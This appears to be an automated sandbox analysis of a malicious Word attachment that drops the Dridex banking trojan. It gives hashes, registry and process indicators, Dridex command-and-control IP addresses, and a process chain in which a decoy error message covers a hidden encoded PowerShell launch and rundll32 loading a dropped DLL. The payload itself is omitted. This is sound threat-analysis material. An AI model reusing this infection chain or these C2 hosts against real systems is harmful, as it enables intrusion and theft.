Analysis
max time kernel: 139s
max time network: 140s
platform: windows10_x64
resource: win10v20201028
submitted: 08-12-2020 10:04
Static task: static1
Behavioral task: behavioral1
Sample: Payment form-976107909.doc
Resource: win7v20201028
General
Target: Payment form-976107909.doc
Size: 125KB
MD5: e5bba655925c16e96ca53ac03a5be3e0
SHA1: 0c0bae0188249370efe950627192f63929d02e64
SHA256: c71ee0a48c0b3f9447490e67c8fefa200785ece00e91a8c24036d230ac0c4b91
SHA512: 2c82fa4900ded1d5022ee0982060328cf3fe7f71800c8bbdd7fd6a3aa1df794a78d5ef66b1964c960ee1b9c9fd7c93a3129efa8330b531fa80fe04f98208df32
Malware Config
Extracted
(list of download URLs omitted)
Extracted
dridex
10555
104.131.164.93:443
46.101.90.205:4643
27.254.174.84:4443
92.94.251.127:3786
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3516 | 3460 | cmd.exe
Processes:
resource | yara_rule
behavioral2/memory/2204-17-0x0000000002DC0000-0x0000000002DFD000-memory.dmp | dridex_ldr
Blocklisted process makes network request 3 IoCs
Processes:
flow | pid | process
19 | 2116 | powershell.exe
27 | 2204 | rundll32.exe
29 | 2204 | rundll32.exe
Loads dropped DLL 1 IoCs
Processes:
pid | process
2204 | rundll32.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | rundll32.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
pid | process
644 | WINWORD.EXE
644 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pid | process
2116 | powershell.exe
2116 | powershell.exe
2116 | powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2116 | powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
pid | process
644 | WINWORD.EXE
644 | WINWORD.EXE
644 | WINWORD.EXE
644 | WINWORD.EXE
644 | WINWORD.EXE
644 | WINWORD.EXE
644 | WINWORD.EXE
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
description | pid | process | target process
PID 3516 wrote to memory of 1168 | 3516 | cmd.exe | msg.exe
PID 3516 wrote to memory of 1168 | 3516 | cmd.exe | msg.exe
PID 3516 wrote to memory of 2116 | 3516 | cmd.exe | powershell.exe
PID 3516 wrote to memory of 2116 | 3516 | cmd.exe | powershell.exe
PID 2116 wrote to memory of 2300 | 2116 | powershell.exe | rundll32.exe
PID 2116 wrote to memory of 2300 | 2116 | powershell.exe | rundll32.exe
PID 2300 wrote to memory of 2204 | 2300 | rundll32.exe | rundll32.exe
PID 2300 wrote to memory of 2204 | 2300 | rundll32.exe | rundll32.exe
PID 2300 wrote to memory of 2204 | 2300 | rundll32.exe | rundll32.exe
Processes
Level 1: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment form-976107909.doc" /o ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
Level 1: C:\Windows\system32\cmd.exe
Command line: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD [base64-encoded PowerShell command omitted]
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
Level 2: C:\Windows\system32\msg.exe
Command line: msg Admin /v Word experienced an error trying to open the file.
Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: POwersheLL -w hidden -ENCOD [base64-encoded PowerShell command omitted]
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Level 3: C:\Windows\system32\rundll32.exe
Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll,0
- Suspicious use of WriteProcessMemory
Level 4: C:\Windows\SysWOW64\rundll32.exe
Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll,0
- Blocklisted process makes network request
- Loads dropped DLL
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll
MD5: e231230db7f22a3977bbfa422d84724d
SHA1: 72788c18e5677d4f6980bdc85da0b143b7068ef3
SHA256: 0e05563f14300ca66f0bc35532feb92e6e0023e8bb124de7975cc1a5de97d714
SHA512: cd5b2f9d0d3b18ac123532d240d5b1811d66c39d127de6bd7738ce39223a2fc81a34cab1c20e1dcd781e443aa26f4a050a36bc74b8c6aea87b2e626a598df455
memory/644-2-0x000001EA94EB0000-0x000001EA954E7000-memory.dmp  Filesize: 6.2MB
memory/644-3-0x000001EA9E7B8000-0x000001EA9E7BF000-memory.dmp  Filesize: 28KB
memory/1168-8-0x0000000000000000-mapping.dmp
memory/2116-9-0x0000000000000000-mapping.dmp
memory/2116-10-0x00007FFC29430000-0x00007FFC29E1C000-memory.dmp  Filesize: 9.9MB
memory/2116-11-0x0000018970B70000-0x0000018970B71000-memory.dmp  Filesize: 4KB
memory/2116-12-0x0000018970D20000-0x0000018970D21000-memory.dmp  Filesize: 4KB
memory/2204-15-0x0000000000000000-mapping.dmp
memory/2204-17-0x0000000002DC0000-0x0000000002DFD000-memory.dmp  Filesize: 244KB
memory/2300-13-0x0000000000000000-mapping.dmp